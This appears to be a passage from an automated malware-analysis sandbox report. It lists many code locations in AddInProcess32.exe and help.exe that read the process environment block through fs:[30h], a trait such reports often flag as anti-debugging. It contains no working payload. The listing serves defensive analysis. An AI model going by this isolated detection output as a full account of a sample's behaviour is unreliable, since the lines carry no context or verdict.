Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A8FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A8FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A8FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A8FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A78DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A46DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A46DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A46DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A46DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A46DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A46DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019DD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019DD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A8E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A4A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A98D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019CAD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019E7D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A03D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A43540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019EC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019EC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A814FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A46CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A46CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A46CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A98CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A9740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A9740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A9740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A46C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A46C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A46C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A46C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019FBC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019FA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019E746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A5C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A5C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D8794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A47794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A47794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A47794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A037F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019EF716 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019FA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019FA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A9070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A9070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019FE730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019C4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A5FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A5FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A98F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019DEF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019DFF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A446A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A90EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A90EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A90EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A5FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A7FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A08EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D76E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A98ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019FA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019FA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A7FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019CC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019CC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019CC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019F8E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A81608 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019CE620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A8AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A8AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019EAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019EAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019EAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019EAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019EAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_019D766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F26CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F26CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F26CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F614FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F78CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F3B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F3B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F3B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F3B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F3B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F3B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EE90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EDF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EDF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EDF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EB849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F23884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F23884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EC746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F71074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F62073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F3C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F3C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EDA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EC0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EC0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EBB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EBB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EBB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EBB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EDBC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F74015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F74015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F27016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F27016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F27016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F61C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F61C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F61C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F61C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F61C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F61C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F61C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F61C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F61C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F61C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F61C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F61C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F61C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F61C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F26C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F26C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F26C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F26C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F7740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F7740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F7740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F58DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EAB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EAB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EAB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EBD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EBD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F6FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F6FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F6FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F6FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F341E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F26DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F26DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F26DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F26DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F26DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F26DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F251BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F251BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F251BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F251BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F269A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F705AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00F705AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EA2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00EDA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe	Code function: 6_2_00ED2581 mov eax, dword ptr fs:[00000030h]
